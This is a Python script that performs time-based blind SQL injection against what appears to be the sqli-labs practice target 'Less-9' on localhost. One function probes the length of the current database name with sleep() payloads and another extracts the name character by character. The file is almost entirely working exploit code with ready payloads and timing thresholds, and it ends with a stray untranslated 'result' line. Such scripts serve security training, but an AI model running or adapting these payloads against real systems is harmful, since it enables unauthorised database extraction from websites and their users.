import datetime
import time

import requests
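def database_length(url="http://127.0.0.1/sql/Less-9/?id=1", *, max_len=8,
                    threshold=5.0, timeout=30.0, session=None):
    """Recover the length of the current database via time-based blind SQLi.

    Each probe appends ``' and if(length(database())>i,sleep(1),1)--+`` to
    ``url`` and treats a response slower than ``threshold`` seconds as
    "condition true".  Probes run for i = 1, 2, ... and the first *fast*
    response means ``length > i`` is false; because every earlier probe was
    true, the length is exactly ``i``.

    Args:
        url: Injection point including the vulnerable parameter and its
            value.  The payload is appended verbatim; the trailing ``+`` is
            left for the server to decode as the space that terminates the
            ``--`` comment.
        max_len: Largest length probed (inclusive).  If every probe up to
            ``max_len`` is "true" the function reports a failure instead of
            silently claiming ``max_len`` as the answer.
        threshold: Elapsed seconds above which a response counts as "true".
            The original author measured >= 5 s on the lab target even
            though the payload sleeps 1 s (presumably the condition is
            evaluated once per matching row — re-calibrate on your target).
            Network jitter near the threshold produces wrong answers, so
            keep a wide margin.
        timeout: Per-request socket timeout so a stalled target cannot hang
            the scan; it must be larger than ``threshold`` or every "true"
            probe raises instead of being measured.
        session: Object exposing ``get(url, timeout=...)`` such as a
            ``requests.Session`` (proxy, cookies, headers).  Defaults to the
            ``requests`` module.

    Returns:
        The recovered length, or ``None`` when no probe up to ``max_len``
        came back fast (length > max_len, or the target is uniformly slow).
    """
    client = requests if session is None else session
    length = None
    for i in range(1, max_len + 1):
        payload = "' and if(length(database())>%d,sleep(1),1)--+" % i
        # monotonic() is immune to wall-clock adjustments, unlike datetime.now().
        started = time.monotonic()
        client.get(url + payload, timeout=timeout)
        elapsed = time.monotonic() - started
        if elapsed < threshold:
            # Fast reply: "length > i" is false, and all smaller i were true.
            length = i
            break
    if length is None:
        print('database_length: not found (longer than', max_len,
              'or target always slower than threshold)')
    else:
        print('database_length:', length)
    return length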
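if __name__ == "__main__":
    # Only fire probes at the target when run as a script, not on import.
    database_length()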
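def database_name(url="http://127.0.0.1/sql/Less-9/?id=1", *, length=None,
                  max_len=8, charset='0123456789abcdefghijklmnopqrstuvwxyz_',
                  threshold=5.0, timeout=30.0, session=None):
    """Recover the current database name character by character (time-based blind SQLi).

    For position ``a`` and candidate ``b`` the probe
    ``' and if(substr(database(),a,1)='b',sleep(1),1)--+`` is appended to
    ``url``.  Only a *slow* response (>= ``threshold`` seconds) is taken as a
    hit; a fast one merely rules out that candidate, so the loop keeps trying
    the remaining characters of ``charset``.

    Args:
        url: Injection point including the vulnerable parameter and its
            value; the payload is appended verbatim.
        length: Known name length, e.g. the result of ``database_length()``.
            When ``None``, positions 1..``max_len`` are probed and extraction
            stops at the first position with no match, which is taken as the
            end of the name.
        max_len: Upper bound on positions probed when ``length`` is unknown.
        charset: Candidates tried at each position, in order.  Default is
            lowercase alphanumerics plus ``_``.  A character outside this set
            cannot be recovered; the function then stops rather than skipping
            the position, because skipping would shift every later character
            and yield a plausible-looking but wrong name.
        threshold: Seconds above which a response counts as a hit (see
            ``database_length`` for calibration caveats).
        timeout: Per-request socket timeout; must exceed ``threshold``.
        session: Object exposing ``get(url, timeout=...)``; defaults to the
            ``requests`` module.

    Returns:
        The recovered name.  It is a prefix of the real name when a position
        had no matching candidate (a warning is printed if ``length`` was
        given, since that case is unambiguous).
    """
    client = requests if session is None else session
    positions = max_len if length is None else length
    name_chars = []
    for position in range(1, positions + 1):
        for candidate in charset:
            payload = ("' and if(substr(database(),%d,1)='%s',sleep(1),1)--+"
                       % (position, candidate))
            started = time.monotonic()
            client.get(url + payload, timeout=timeout)
            if time.monotonic() - started >= threshold:
                name_chars.append(candidate)
                break
        else:
            # Exhausted the charset: end of name (length unknown) or a
            # character we cannot represent.  Stop instead of misaligning.
            if length is not None:
                print('database_name: position', position,
                      'matched nothing in charset; result is incomplete')
            break
    d_name = ''.join(name_chars)
    print('database_name:', d_name)
    return d_name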
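if __name__ == "__main__":
    # Only fire probes at the target when run as a script, not on import.
    database_name()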
结果: